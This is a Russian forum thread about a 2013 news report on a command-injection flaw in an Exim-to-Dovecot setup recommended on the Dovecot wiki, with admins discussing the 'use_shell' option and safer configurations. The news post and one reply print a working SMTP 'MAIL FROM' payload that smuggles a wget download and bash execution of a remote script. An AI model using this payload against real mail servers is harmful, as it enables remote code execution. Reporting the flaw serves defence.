URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 89882
[ Назад ]

Исходное сообщение
"Опасная уязвимость при необдуманном использовании связки Exi..."

Отправлено opennews , 05-Май-13 00:43 
В рекомендованном (http://wiki.dovecot.org/LDA/Exim?action=recall&rev=16) на wiki-сайте проекта и в некоторых других руководствах примере настройки связки почтового сервера Exim с IMAP/POP3-сервером Dovecot выявлена критическая уязвимость (https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...), позволяющая выполнить произвольный код на сервере. Уязвимость может быть эксплуатирована через отправку письма со специальным образом оформленным адресом отправителя. Проблема проявляется только в системах, в которых в конфигурации Exim указана опция "use_shell" в блоке подключения Dovecot.


Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства. Всем пользователям связки Exim и Dovecot рекомендуется проверить настройки на предмет отсутствия опции "use_shell", при включении которой агент доставки запускается с использованием shell и передачей параметров в командной строке. Метод эксплуатации достаточно прост и сводится к манипуляции с экранированием спецсимволов, позволяя в итоге добиться выполнения shell-команд.

Например, атакующий может указать:


<font color="#461b7e">
MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
</font>

В процессе обработки такого запроса exim выполнит


<font color="#461b7e">
/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f             \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"
</font>


что приведёт к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его запуску.

URL: https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...
Новость: http://www.opennet.me/opennews/art.shtml?num=36859


Содержание

Сообщения в этом обсуждении
"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 05-Май-13 01:28 
Ай красава! +100500

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено AnonuS , 05-Май-13 01:36 
> Ай красава! +100500

Павлик, а ты чего так сильно обрадовался ?


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 05-Май-13 03:14 
Ну дык:

> MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com

А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища...  :D


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено AnonuS , 08-Май-13 00:28 
> Ну дык:
>> MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
> А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища...
>  :D

Да, ты прав, это действительно новое слово в науке и технике, свежая струя так сказать...

:-)))


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 01:44 
ohh shit

    address_pipe:
        driver = pipe
        ignore_status
        return_output
        use_shell


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 02:33 
что вы в фичах понимаете :) это же так удобно! и никаких RMS не нужно :)

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Sylvia , 05-Май-13 03:03 
таки проблема на стороне Exim, эхх, опять г-н Сирайнен денег не даст за дырку (:

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 08:33 
Конечно, не даст. Дырка-то не его.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено koblin , 05-Май-13 03:35 
распространение "уязвимости" через вики с документацией! а что, хорошая идея

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 09:17 
unixway для вирусов

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено all_glory_to_the_hypnotoad , 05-Май-13 12:55 
exim с его вики это не юникс вей

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 08:31 
Начинающий почтовик задает вопрос гуру. Зачем Exim нужен Dovecot-у.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 08:47 
Не-а. Zimbra возьму лучше.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено robux , 05-Май-13 10:42 
Обратный вопрос: зачем exim'у нужен dovecot?
Экзим и не зная ничего об довекоте прекрасно работает.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 10:43 
> Обратный вопрос: зачем exim'у нужен dovecot?
> Экзим и не зная ничего об довекоте прекрасно работает.

Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 05-Май-13 12:20 
>> Обратный вопрос: зачем exim'у нужен dovecot?
>> Экзим и не зная ничего об довекоте прекрасно работает.
> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Представь себе! Exim - это SMTP



"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 12:45 
>>> Экзим и не зная ничего об довекоте прекрасно работает.
>> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...
> Представь себе! Exim - это SMTP

Экзим - это программа!


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено rshadow , 05-Май-13 14:33 
Отмаз не защитан.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 05-Май-13 15:02 
> Экзим - это программа!

Программа - это "Здоровье" с Еленой Малышевой, а Exim - это MTA (Mail ТруЪ Agent)!


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 23:06 
> Exim - это SMTP
> Exim - это MTA

Прям, не программа, а какой-то Людовик Четырнадцатый в бинарном представлении...


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 06-Май-13 16:27 
BMW Z4 - машина.
BMW Z4 в пос. Кукуево - понты граничащие с маразмом.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 06-Май-13 18:57 
> BMW Z4 - машина.
> BMW Z4 в пос. Кукуево - понты граничащие с маразмом.

BMW Z4 в придорожном столбе (вследствие неумения обращаться с) - источник лулзов :)
Впрочем, как и экзим с довекотом, да и почти любой другой софт.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено robux , 05-Май-13 17:18 
> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Ваша логика: "Сталин воевал с Гитлером, поэтому они братья".

Exim и Dovecot пересекаются только на общих базах [сообщений и юзеров].
На общих базах, понимаешь? При этом на уровне API они не обязаны быть связаны.

То, что кто-то костыляет одно через другое, тем более привязывает MTA к POP-серверу (а не наоборот), то он сам себе злой буратинко. О чем в новости и написано.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено quux , 05-Май-13 18:57 
MTA вызывает MDA для локальной доставки, где вы API и привязки какие-то увидели ?

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 23:15 
> MTA вызывает MDA для локальной доставки, где вы API и привязки какие-то увидели ?

Ну, очень удобно из экзима обращаться к довекотовскому аутентификатору, например, для TLS. И вообще, если рядом с экзимом живет довекот, то LDA, фильтрацию, квоты и аутентификацию гораздо удобнее и функциональнее спихнуть именно на довекот.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 06-Май-13 20:31 
а вот спорим, что вы сами никогда реальный почтовый сервер не поднимали...

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено angra , 05-Май-13 20:03 
Работает конечно, но вот только единый механизм аутентификации и укладки писем в maildir лучше чем два независимых. Ну а там где почтовик просто посылает всю почту на другой хост обычно nullmailer хватает.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 23:25 
> Работает конечно, но вот только единый механизм аутентификации
> и укладки писем в maildir лучше чем два независимых.

Укладки _И_ извлечения!

У всех, кто не пользуется довекотовским ЛДА из МТА, наверчены жуткие извраты в пермишнах мейлдиров.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено анон , 05-Май-13 12:14 
Dovecot не MTA, а exim MTA.

Ваш К.О.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено kombat , 05-Май-13 19:48 
это когда фетчмейл получив с внешнего ящика письмо, отправляет екзиму, например, на локалхост:25, а тот кладет в мейлдир, который довекотом отдается локальному юзеру через поп или имап.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено YetAnotherOnanym , 05-Май-13 09:29 
Вот поэтому надо самому курить документацию на софт (а также основополагающие документы типа RFC), а не настраивать, как обезьяна, по статьям на сторонних ресурсах.
Да, это долго и муторно, но по-другому никак.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Int , 05-Май-13 09:49 
>Вот поэтому надо самому курить документацию на софт (а также основополагающие документы типа RFC), а не настраивать, как обезьяна, по статьям на сторонних ресурсах.

"Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot"

официальный сайт это сторонний ресурс ? делаааа


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено анон , 05-Май-13 12:57 
Я видел эту статью, но мне хватило мозгов, не тупо скопировать, а розобраться что означает _каждый_ параметр в примере. И я убрал use_shell, поскольку он мне не нужен был - он вообще мало кому нужен.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено анон , 05-Май-13 13:02 
Вообще надо быть крайне одаренным эникеем, чтоб скопировать и не обратить внимание на этот параметр, который в названии просто кричит о своей подлой сущности.



"Опасная уязвимость при необдуманном использовании связки..."
Отправлено arisu , 05-Май-13 15:21 
на официальных сайтах надо давать примеры с патчем Бармина, и только такие. чтобы дебилы отсеивались ещё на подлёте.

"Опасная уязвимость при необдуманном использовании связки..."
Отправлено анон , 05-Май-13 17:14 
Да это и есть бармин в чистом виде, только сильно отложенный. Но, думаю, те кто умеют читать между строк, с этого руководства свой профит поимели.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 10:35 
Это еще что! Мне как-то доводилось переделывать почтовик, настроенный по статье "у Лисяры". Так в статье с шутками и прибаутками рекомендовалось почтовику давать рутовый доступ к БД и ФС.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 05-Май-13 12:23 
>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.

Если чо, рут у базы данных != root в /etc/passwd


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 12:44 
>>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.
> Если чо, рут у базы данных != root в /etc/passwd

Если чо, то в рутовом доступе к БД веселого очень немного.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 14:10 
> Если чо, то в рутовом доступе к БД веселого очень немного.

Таких б@лванов, тем не менее, просто мечут, как икру.

Лисяра, в этом отношении, просто редкостно од@ренный тип: "Я не стал разбираться, почему не работает, просто дал chmod 777 *".

О принципе наименьшей привилегии вообще мало кто слышал из кр@сноглазых "самоучек". Гении среди гогна и удобрений.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено rshadow , 05-Май-13 14:36 
Обыкновенные пользователи. Они навсех системах одинаковы.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено rshadow , 05-Май-13 14:38 
> О принципе наименьшей привилегии...

Зато принципом наименьшего сопротивления пользуются все


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 05-Май-13 15:07 
>>>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.
>> Если чо, рут у базы данных != root в /etc/passwd
> Если чо, то в рутовом доступе к БД веселого очень немного.

Да нет там рута! Там есть привилегии и контекст.  

Кстати, для полного счастья, и проверки феншуйности вашего UNIX,
нужно создать другого юзера с UID==0, удалить рута, и проверить
работоспособность всей системы.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 22:58 
> Кстати, для полного счастья, и проверки феншуйности вашего UNIX,
> нужно создать другого юзера с UID==0, удалить рута, и проверить
> работоспособность всей системы.

Так оно у меня так штатно делается уже хрен знает сколько лет.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 23:03 
> Да нет там рута! Там есть привилегии и контекст.

При установке мускля автоматом создается юзер БД root с пустым паролем и полными привилегиями, включая грант, на таблицу mysql. Так что, я б поостерегся делать скоропалительные заявления.


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено pavlinux , 06-Май-13 16:29 
>> Да нет там рута! Там есть привилегии и контекст.
> При установке мускля автоматом создается юзер БД root с пустым паролем и
> полными привилегиями, включая грант, на таблицу mysql. Так что, я б
> поостерегся делать скоропалительные заявления.

ПИН-код на кредитке фломастером не пишешь? :)


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 06-Май-13 19:13 
> ПИН-код на кредитке фломастером не пишешь? :)

Неа :)

Я всего лишь пытаюсь донести до общественности простую мысль, что на большинстве хостов, настроенных конфиг-киддизами по популярным гогно-руководствам, можно обнаружить массу презабавнейшего - от тупо дефолтного до адвансед-кривого бай дезигн "по рекомендациям от лучших собаководов".


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Дед Анон , 05-Май-13 09:37 
Ахренеть! Вот это скорость! Вот это официальный ман на Wiki!

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Drontozaurus , 05-Май-13 09:45 
Есть замечательный проект - Exim4U (exim4u.org), облегчающий процесс приручения к виртуальным доменам. MySQL, SPF, DKIM и т.д. Единственный его косяк - хранение паролей в чистом виде по-умолчанию, что замечательно переделывается на хэши, поддерживаемые как exim так и dovecot.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Int , 05-Май-13 09:48 
>Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства.

Смешно. Охренено смешно. :(


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Прохожий , 05-Май-13 10:07 
Думать своей головой надо.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено DeadLoco , 05-Май-13 10:42 
> Думать своей головой надо.

И доки читать

EXIM 29:5
If this option is set, it causes the command to be passed to /bin/sh instead of being run directly from the transport, as described in section 29.3. This is less secure, but is needed in some situations where the command is expected to be run under a shell and cannot easily be modified


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено vitalif , 05-Май-13 11:40 
У меня с EXIM'ом знакомство пока как-то по такому алгоритму: поставил, посмотрел, решил какой-то он косой, снёс, поставил postfix.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено quux , 05-Май-13 12:19 
Увы это больше говорит о вас нежели об exim'e.

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 12:30 
Morris Worm strikes back!

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 12:37 
прыщеглазики опять прощляпили

"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Аноним , 05-Май-13 14:14 
> прыщеглазики опять прощляпили

Прыщебл@дам просто западло академическое образование получать. Поколение вики, блжад. Принцип наименьшей привилегии в универнситетах вколачивают в тупые головы студоты!


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено angra , 05-Май-13 20:10 
Увы, но уровень знаний преподов в области IT в наших универах зачастую ниже чем у эникейщиков. Во многих местах до сих программирование по трупопаскакалю изучают, а ОСи по менюшкам ворда.



"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Михрютка , 05-Май-13 12:54 
как дети чесслово. шеллы какие-то, эскейпирование.

учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо

http://www-01.ibm.com/support/docview.wss?uid=swg21633819

"The IBM Notes mail client accepts Java applet tags and JavaScript tags inside HTML emails, making it possible to load Java applets and scripts from a remote location."


"Опасная уязвимость при необдуманном использовании связки Exi..."
Отправлено Andrey Mitrofanov , 06-Май-13 23:20 
> как дети чесслово. шеллы какие-то, эскейпирование.
> учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо

Нет, Только bash! Ленин завещал учиться, но до до джаввы же.

> "The IBM Notes mail client accepts Java applet tags and JavaScript tags


"Опасная уязвимость при использовании рекомендуемых в докумен..."
Отправлено Аноним , 06-Май-13 03:02 
Учитесь как надо:

local_delivery:
  driver = lmtp
  user = mail
  socket = /run/dovecot/lmtp

Скока лет ни одной новой дырки.


"Опасная уязвимость при использовании рекомендуемых в докумен..."
Отправлено Аноним , 06-Май-13 13:13 
а как же noexec в /tmp ?

"Опасная уязвимость при использовании рекомендуемых в докумен..."
Отправлено Аноним , 08-Май-13 12:45 
Редко применяется, так как во многихдистрибутивах во время апгрейда пакетов запускаются постинстал скрипты из /tmp